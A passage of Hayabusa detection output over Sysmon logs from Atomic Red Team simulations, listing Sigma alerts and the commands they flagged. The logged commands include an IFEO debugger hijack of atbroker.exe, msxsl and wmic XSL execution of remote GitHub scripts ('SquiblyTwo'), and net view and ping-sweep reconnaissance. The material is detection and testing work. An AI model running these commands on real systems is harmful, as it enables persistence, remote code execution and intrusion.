+09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.027 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.500 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping 